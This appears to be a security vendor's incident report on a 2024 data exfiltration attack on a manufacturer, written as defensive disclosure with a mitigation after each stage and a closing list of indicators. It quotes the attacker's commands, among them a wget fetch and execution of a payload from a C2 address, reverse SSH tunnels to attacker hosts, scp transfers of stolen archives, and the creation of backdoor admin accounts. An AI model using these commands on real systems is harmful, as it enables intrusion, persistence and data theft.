Key Points
- In July 2024, a ReliaQuest customer was targeted by a data exfiltration attack.
- The threat actor gained access to a Fortinet firewall and brute-forced a privileged service account to perform lateral movement.
- Several freely available tools were ingressed to facilitate data exfiltration, such as Secure Copy Protocol (SCP).
- The ReliaQuest Threat Hunting team assisted in investigating and remediating the incident, using GreyMatter Response Playbooks for a swift response.
- Prioritizing perimeter device patch management, ensuring complete endpoint detection and response (EDR) coverage, and implementing comprehensive host-based controls can reduce attack surface and increase the difficulty for threat actors to accomplish their objectives.
In July 2024, ReliaQuest responded to a data exfiltration incident affecting a customer in the manufacturing sector. The threat actor gained access to multiple file servers and exfiltrated business-related data. However, by collaborating closely with the customer, the ReliaQuest Threat Hunting team enabled them to focus their resources on remediation efforts. ReliaQuest assisted the customer by isolating hosts, resetting user accounts, and performing GreyMatter Response Playbooks for an initial rapid response, preventing further damage and allowing for thorough investigation and subsequent remediation actions.
This report shares insights and technical details from the incident to help organizations better understand the current threat landscape and protect their environments from similar threats. It details the main stages of the exfiltration attack lifecycle, from gaining initial access through a Fortinet firewall to creating administrator user accounts for persistence, evading security controls such as Internet Explorer Enhanced Security Configuration (IE ESC), and ultimately exfiltrating data.
Additionally, we reference other tools and tactics commonly employed in data exfiltration incidents and offer practical prevention and mitigation strategies. These insights are designed to assist organizations in strengthening their security posture and implementing actionable steps to minimize the impact of similar data exfiltration attacks.
Attack Lifecycle
Initial Access
The threat actor gained initial access to the environment via an internet-facing Fortinet firewall. Due to logging retention limitations, the device compromise method is unknown, but it is likely the threat actor brute-forced the public administrator console.
The adversary brute-forced user accounts until successfully authenticating with the privileged service account SVC_1. However, attempts to use this service account on multiple machines failed due to SVC_1 lacking interactive logon permissions (Windows Event ID 4625 status code 0xC000015B). Persisting with these efforts, the threat actor eventually authenticated via Secure Shell (SSH) to a development Linux server referred to as Linux_Dev_Server_1.
Interactive logins with service account credentials indicate potential misuse, as these accounts should only be used by applications or services, not users. This behavior suggests that the threat actor was systematically testing the service account credentials across various machines until they found one that permitted access. Restricting interactive logon permissions on multiple hosts was an effective control as it put the burden back on the adversary to perform further discovery to find additional hosts for lateral movement.
Given that 85% of breaches that ReliaQuest responded to from January to July 2024 involved service accounts, it is crucial to rigorously monitor these accounts for any anomalous activity. The misuse of service accounts for interactive logins can be a sign of an ongoing attack and should be promptly investigated to prevent further compromise.
Mitigation
Asset Management and Patching Perimeter Devices: We recently reported on an exfiltration incident where a vulnerable firewall served as the entry point of the attack, highlighting the importance of timely patching. This is especially crucial as we frequently observe this technique in data exfiltration incidents.
Hardening Service Accounts: Service accounts often lack standard password management practices, making them vulnerable to brute-force attacks. To defend against this, ensure the use of long, complex passwords. As seen in this incident, restricting interactive logon permissions is an effective measure to prevent lateral movement. For additional strategies on mitigating service account vulnerabilities, refer to our blog on service account abuse.
A ReliaQuest-authored detection successfully identified the compromised service account. GreyMatter Response Playbooks can be integrated into Automated Response Playbooks (ARPs), which automatically execute remediation actions as soon as a detection rule is triggered. Deploying ARPs can help reduce Mean Time to Contain (MTTC) to under five minutes, significantly minimizing potential damage by stopping a breach early.
Discovery
The threat actor pivoted from the compromised Fortinet firewall using the privileged service account SVC_1 and then used Living off the Land (LotL) techniques for discovery on Linux_Dev_Server_1. These commands aimed to assess user privileges, identify the hosts to which they gained access, and enumerate network shares for data exfiltration opportunities.
LoTL techniques involve attackers leveraging normal system commands and tools to carry out malicious activities while blending in with legitimate processes. This stealthy approach makes detection significantly more difficult, as these activities seamlessly integrate with normal system operations. As a result, threat actors can remain undetected for extended periods, giving them more time to explore the environment, escalate privileges, and identify valuable data for exfiltration. This extended presence heightens the risk of more severe attacks, such as deploying ransomware, emphasizing the critical need for advanced detection and rapid response capabilities.
The table below outlines the discovery commands we observed throughout the incident on both Linux and Windows servers.
Command | Explanation |
---|---|
last | Displays a list of the most recent user logins on the host. |
python -V | Shows the version of Python installed on the host. |
cat /etc/passwd | Displays the contents of the /etc/passwd file, which contains information about user accounts on the host. |
ping 10.x.x.x | Sends Internet Control Message Protocol (ICMP) Echo Request packets to a specified IP address to test reachability. |
ps aux | Shows details about all running processes on the host. |
net use | A Windows command that lists all current network connections and their status. |
net view 10.x.x.x | Views shared resources on 10.x.x.x, such as folders. |
quser | Displays information regarding user sessions on the host. |
Mitigation
Network Segmentation: As in this incident, attackers often look for network shares to perform exfiltration. Proper network segmentation between development and production devices limits the information a threat actor can discover, increasing the difficulty and time required to identify and access critical systems and sensitive data. Only specific accounts that need to list network shares should have this privilege. This strategy helps prevent attackers from discovering critical hosts containing sensitive data and reduces the amount of confidential information they can acquire.
Lateral Movement
The threat actor used SSH to pivot between Linux servers and Remote Desktop Protocol (RDP) to move to Windows servers. Using the same service account, SVC_1, the threat actor accessed additional hosts, including another Linux Development Server (Linux_Dev_Server_2) and a production Windows server (Windows_Prod_Server_1). The adversary also accessed hosts without endpoint detection and response (EDR) sensors and logging visibility, hindering detection opportunities and allowing them to persist in the environment. Extended persistence on additional hosts complicates remediation, as more investigation is required, which leads to a longer MTTC. This gives attackers more time to exfiltrate data and deploy more destructive payloads like ransomware, causing significant operational and financial damage. This underscores the critical need for comprehensive EDR coverage and robust logging practices to detect and respond to threats promptly, minimizing the window of opportunity for attackers and reducing the risk of extensive damage.
Attackers often leverage built-in remote management tools such as SSH for Linux and RDP for Windows to move laterally within an environment. Since administrators use these tools legitimately, it is less suspicious and harder to detect when attackers use them maliciously. In some cases an adversary will install commercial remote monitoring and management (RMM) solutions for lateral movement and maintaining persistent access, which provide many of the same benefits for defense evasion.
Below are command lines used by the threat actor to move laterally to additional hosts in the environment.
Command | Explanation |
---|---|
ssh [email protected] | Linux command to establish an SSH connection to a specified IP address using the privileged service account. |
mstsc /v:10.x.x.x | Windows command used to launch the Remote Desktop Connection client and connect to a Windows host. |
Mitigation
Limit RDP Access with Network-Level Authentication: Enable NLA to require users to authenticate before a full RDP session is established. Additionally, restrict RDP access to specific IP addresses. This adds an extra layer of security by ensuring that only authenticated users can initiate an RDP session. Limiting access to known IP addresses or requiring VPN access greatly hardens authentication measures. Please see our RDP brute-force blog for additional mitigation recommendations.
Complete EDR Coverage: Threat actors often target systems without EDR agents and logging visibility, as observed in this incident. This lack of coverage hinders detection and investigation, making it easier for them to achieve their objectives. To mitigate this, maintain an up-to-date inventory of assets and require EDR installation on new hosts as soon as they are commissioned.
Privilege Escalation and Persistence
The threat actor ran the command sudo su to escalate their privileges to root on host Linux_Dev_Server_1. The following day, the attacker created several user accounts with inconspicuous names like “itsupport.” In an effort to escalate privileges, the attacker then attempted to edit the Linux /etc/sudoers file, which specifies users with elevated privileges.
Listed below are the commands executed by the threat actor to create the user itsupport and escalate privileges on Linux_Dev_Server_1.
Linux Command | Explanation |
---|---|
useradd itsupport | Creates a new local user account named itsupport. |
cat /etc/sudoers | Displays the contents of the sudoers file, which specifies users with elevated privileges. |
chmod +w /etc/sudoers | Adds write permission to the sudoers file, allowing the threat actor to make edits. |
vim /etc/sudoers | Opens the sudoers file in the vim text editor, likely to add the newly created user itsupport to escalate the attacker’s privileges. |
chmod -w /etc/sudoers | Removes write permission from the sudoers file. |
The following day, the threat actor created the same itsupport user on Windows_Prod_Server_1 and subsequently added itsupport to the Local Administrators group to escalate privileges using these commands.
Windows Command | Explanation |
---|---|
net user itsupport PASSWORD /add | Creates a new local user account named itsupport with a specified password. |
net localgroup administrators itsupport /add | Adds the itsupport user to the Administrators group, granting local administrative privileges. |
Threat actors often create new user accounts with administrative privileges instead of using their current compromised accounts. The advantages of doing this include:
- New user accounts ensure persistence even if the original account is disabled.
- Creating a new user account helps evade detection, as a new account may not immediately raise suspicion compared to unusual activity on an existing account.
- By creating new user accounts, attackers can distribute their activities across multiple accounts, making it harder for defenders to trace and understand the full scope of the attack.
Mitigation
File Integrity Monitoring and Access Controls: Monitoring account creation events and changes to Local Administrators groups is crucial for detecting unauthorized privilege escalation and persistence. Security teams should also implement file integrity monitoring to detect unauthorized changes to critical files like /etc/sudoers and enforce strict access controls to sensitive files and directories to prevent unauthorized modifications. By closely monitoring these activities and implementing robust security controls, organizations can detect and respond to privilege escalation attempts more effectively.
Command-and-Control
The threat actor used the Linux commands Wget and cURL to retrieve payloads over HTTP from a Vultr-hosted IP address on Linux_Dev_Server_2. The attacker then used OpenSSH Secure Copy Protocol (SCP) to connect to another IP address hosted by DigitalOcean to facilitate command-and-control (C2) communication.
The table below outlines the commands that were run to retrieve payloads from the C2 IP address.
Command | Explanation |
---|---|
curl -v hxxp[://]149.28.219[.]210:9000 | Sends an HTTP GET request to the C2 server at 149.28.219[.]210 over port 9000 |
wget hxxp[:]//149.28.219[.]210/payload.tar.gz | Retrieves the tarball payload payload.tar.gz from the hardcoded IP address 149.28.219[.]210 over HTTP. |
The threat actor created a reverse SSH tunnel on Linux_Dev_Server_1 to remotely access the server’s SSH port 22 by routing connections through HTTPS port 443 from their DigitalOcean IP address. This non-standard use of SSH disguises SSH traffic over port 443, which is typically reserved for HTTPS, making detecting and blocking the malicious activity more difficult. This technique allowed the attacker to connect directly to Linux_Dev_Server_1 without routing their traffic through the compromised Fortinet firewall, thereby establishing further persistence in the environment.
This table lists the commands run by the attacker to set up an SSH tunnel over HTTPS port 443.
Command | Explanation |
---|---|
ssh -qTfnN -R 43222:127.0.0.1:22 [email protected][.]147 -p443 | Creates an SSH tunnel with several options, including requesting SSH be in quiet mode and run in the background before command execution, making the connection less noticeable. |
ssh -CfNg -R 43223:127.0.0.1:22 [email protected][.]147 -p443 | Creates an SSH tunnel with several options, including data compression. |
Vultr and DigitalOcean are examples of cloud-hosting providers. Threat actors frequently exploit these platforms to establish their C2 infrastructure, primarily because they are easy to set up and allow server deployment in geographic locations closer to the target. This enables attackers to swiftly deploy and scale their operations with minimal effort. Attackers prefer less mainstream providers like DigitalOcean and Vultr due to their comparatively lax takedown and verification protocols compared to more recognized providers like Amazon Web Services (AWS).
To counter these threats, ReliaQuest’s Threat Intelligence team maintains an up-to-date feed of indicators of compromise (IOCs) in GreyMatter Intel. This repository integrates more than 40 paid and open-source threat feeds and also incorporates primary source research and insights from breaches across the ReliaQuest customer base, helping organizations effectively detect and mitigate similar attacks. Following this incident, the IP addresses involved were added to GreyMatter Intel, ensuring enhanced protection for customers.
Mitigation
Detect/Block Traffic for Applications Over Non-Standard Ports: Threat actors often use applications over non-standard ports to evade detection. While SSH is typically highly monitored and restricted, HTTP is less monitored and often allowed through firewalls. This makes it a common choice for hiding malicious traffic, as observed in this incident. Intrusion detection systems (IDS) and intrusion prevention systems (IPS) can effectively detect and block anomalous traffic for applications using non-standard ports.
Defense Evasion
Many of the adversary’s actions in this incident—such as using applications over non-standard ports and leveraging LotL techniques—had the aim of evading defenses. In addition to these actions, the adversary also manually modified the sudoers file to avoid triggering alerts, deleted payloads after execution, and installed Firefox to evade Internet Explorer security controls.
The threat actor manually edited the /etc/sudoers file using the vim text editor instead of the recommended visudo command. Using visudo is the standard way to edit the sudoers file because it avoids catastrophic mistakes that can lock users out of sudo. Attackers commonly attempt to escalate privileges by adding compromised accounts to the sudoers file to gain root permissions; as such, the visudo command is strictly monitored. In this incident, the adversary edited the file directly with the vim text editor to evade static detection. Direct modifications are suspicious since most sudo additions occur using visudo or usermod commands.
Additionally, the threat actor checked the status of Internet Explorer Enhanced Security Configuration (IE ESC), a security feature that limits how users can use web browsers on Windows servers. After discovering that IE ESC was enabled, the threat actor downloaded Firefox to bypass this security measure. After downloading Firefox, the attacker ran a private browsing session in Firefox, which doesn’t save the user’s history or cookies, to prevent forensic analysis.
The table below lists the commands run by the attacker to perform these activities.
Command | Explanation |
---|---|
servermanager.exe | Microsoft application used for managing Windows Servers, allowing administrators to install, configure, and manage server roles and features. |
rundll32.exe C:\Windows\system32\iesetup.dll,IEShowHardeningDialog | Checks the status of Internet Explorer Enhanced Security Configuration via ServerManager.exe. |
curl -k -O hxxps[://]cdn.stubdownloader.services[.]mozilla[.]com/builds/firefox-latest-ssl/en-US/win64/…/Firefox%20Setup%20128.0.exe | Uses cURL to download the latest version of the Firefox setup executable from the specified URL. |
C:\Program Files\Mozilla Firefox\private_browsing.exe | Runs a private browsing session in Firefox that doesn’t save history or cookies, thus preventing forensic analysis. |
Mitigation
Restrict the Use of Unauthorized Software: Although Internet Explorer would have blocked the attacker’s attempts, the attacker easily bypassed this by installing additional web browsers. Tools like AppLocker and Software Restriction Policies (SRPs) can restrict software execution to only authorized applications.
Execution
The threat actor retrieved a tarball (.tar.gz) payload from their Vultr C2 IP address over port 9000 on Linux_Dev_Server_2. After extracting the payload and making it executable, the threat actor attempted to run it five times using the nohup command (no hang up). However, each execution attempt was blocked by the EDR agent on the host. The threat actor then viewed the processes on the host, likely to determine if the host had an EDR agent and troubleshoot why the payload execution was unsuccessful. After deleting the payload to prevent forensic analysis, the attacker ceased all activity on this host. This underscores the importance of maintaining effective EDR coverage to prevent attackers from advancing through the kill chain.
The table below outlines the commands used by the threat actor to execute their payload in chronologic order.
Command | Explanation |
---|---|
wget hxxp[:]//149.28.219[.]210/payload.tar.gz | Retrieves the tarball payload payload.tar.gz from the hardcoded IP address 149.28.219[.]210 over HTTP. |
tar xzvf /tmp/payload.tar.gz | Extracts the contents of the tarball (a compressed archive file). |
chmod +x /tmp/payload | Adds executable permission to the payload. |
nohup /tmp/payload -nostderr | Executes the payload, ignoring hangup signals and suppressing standard error output. |
rm -f /tmp/payload | Removes the payload from the host to prevent forensic analysis. |
Mitigation
Set EDR Policy to Block Threats: Setting the EDR policy to “block” rather than just “detect” malicious threats is crucial for immediate threat mitigation and reducing MTTC. As observed in this incident, blocking threats in real time prevents further damage and minimizes the impact of an attack.
Exfiltration
A day after failing to execute their malicious payload on Linux_Dev_Server_2, the adversary used the freely available Windows data compression tool WinRAR to compress data. They then attempted to exfiltrate the data to their C2 IP addresses over HTTP/S ports by using the open-source tool OpenSSH SCP—a tool that allows files to be transferred via the encrypted SSH protocol. Port 443 is used for legitimate HTTPS traffic, so is often allowed through firewalls and monitored less rigorously compared to ports such as SSH port 22, which is more frequently scrutinized as it is commonly used in malicious activities. By targeting port 443, the attacker aimed to exploit the less stringent monitoring to evade detection.
The threat actor attempted exfiltration to various IP addresses multiple times through different commands. However, these attempts were interrupted by a User Behavior Analytics (UBA) tool and remediation efforts carried out by the customer and ReliaQuest to contain the host. These remediation efforts included performing a full investigation on all the compromised hosts and resetting all the compromised service accounts. ReliaQuest also performed GreyMatter Response Playbooks on behalf of the customer to block the IP addresses observed in the incident.
The table below outlines the commands run by the attacker in chronological order before they were interrupted by UBA and removed from the environment:
Command | Explanation |
---|---|
curl -k -O hxxps[://]www.rarlab[.]com/rar/winrar-x64-701.exe | Downloads a WinRAR executable via cURL. |
winrar-x64-701.exe | Installs WinRAR. |
C:\Program Files\WinRAR\WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . “Z:\Multiple\Directory\Paths” | Uses WinRAR to create new archive “DATA.rar,” which contains multiple directories containing sensitive data on a file share. |
curl -k -O hxxps[://]the.earth[.]li/~sgtatham/putty/latest/w64/pscp.exe | Downloads the OpenSSH SCP tool. |
scp DATA.rar test[@]192.241.139[.]130:/home/test -P 443 | Transfers the DATA.rar file to DigitalOceans IP address 192.241.139[.]130 over HTTPS port 443 into the “test” user account’s home directory. |
scp -P 443 DATA.zip root[@]45.77.94[.]53:/root | Transfers the DATA.zip file to Vultr IP address 192.241.139[.]130 over HTTPS port 443 into the “root” user account’s directory. |
scp -P 80 DATA.zip root[@]209.250.244[.]179:/root/ | Transfers the DATA.zip file to Vultr IP address 209.250.244[.]179 over HTTP port 80 into the “root” user account’s directory. |
Attackers often use freely available compression tools such as WinRAR to compress large amounts of data. By doing so, they speed up the exfiltration process and can evade detection as network anomaly alerts looking for large data transfers will not be triggered. Additionally, they employ commonly available exfiltration tools such as SCP because of their widespread use and trusted reputation, which helps reduce suspicion and avoids raising red flags with security monitoring systems.
Understanding attackers’ methods is crucial for improving your organization’s security posture. Awareness of these tactics allows you to better prepare and implement more effective and targeted monitoring and response strategies. For a deeper dive into the tools and techniques commonly used by attackers for data exfiltration, see our blog on exfiltration tools.
Mitigation
Deploy Security Tools to Detect and Prevent Exfiltration: UBA tools can be deployed to monitor and analyze user behavior patterns. These tools can detect anomalies such as unusually large data transfers or access patterns that deviate from normal activity, which, in turn, trigger alerts for further investigation. IDS and IPS systems can also be deployed to monitor network traffic for unusual patterns, as well as detect and block suspicious activities, preventing data exfiltration.
Conclusion
The data exfiltration incident detailed in this report underscores the common tactics employed by threat actors, who often take the path of least resistance to achieve their objectives. Attackers frequently use native commands like SSH and freely available tools such as WinRAR for data compression and OpenSSH SCP for secure data transfer. These commands and tools help attackers evade detection systems and exploit less-monitored network traffic channels. This highlights the critical importance of having robust solutions to counter these prevalent tactics and tools to ensure a strong security posture.
By working as an extension of the customer’s security team, ReliaQuest carried out an investigation and recommended effective remediation strategies—such as isolating affected hosts, resetting compromised service accounts, and deploying GreyMatter Response Playbooks to block IOCs—allowing the customer to focus on implementing response actions, ensuring that further damage was prevented. Additionally, creating ARPs to automate response and containment actions further enhances an organization’s overall security operations by reducing their MTTC to as little as five minutes. By adopting these strategies and leveraging advanced detection and response capabilities, organizations can better prepare for and mitigate similar threats, ensuring threats are stopped early in the attack lifecycle and critical assets are safeguarded.
Indicators of Compromise
IP Address | Cloud Service Provider | IP Address | Cloud Service Provider |
---|---|---|---|
45.77.94[.]53 | Vultr | 167.172.134[.]147 | DigitalOcean |
64.94.85[.]219 | BL Networks | 192.241.139[.]130 | DigitalOcean |
149.28.219[.]210 | Vultr | 209.250.244[.]179 | Vultr |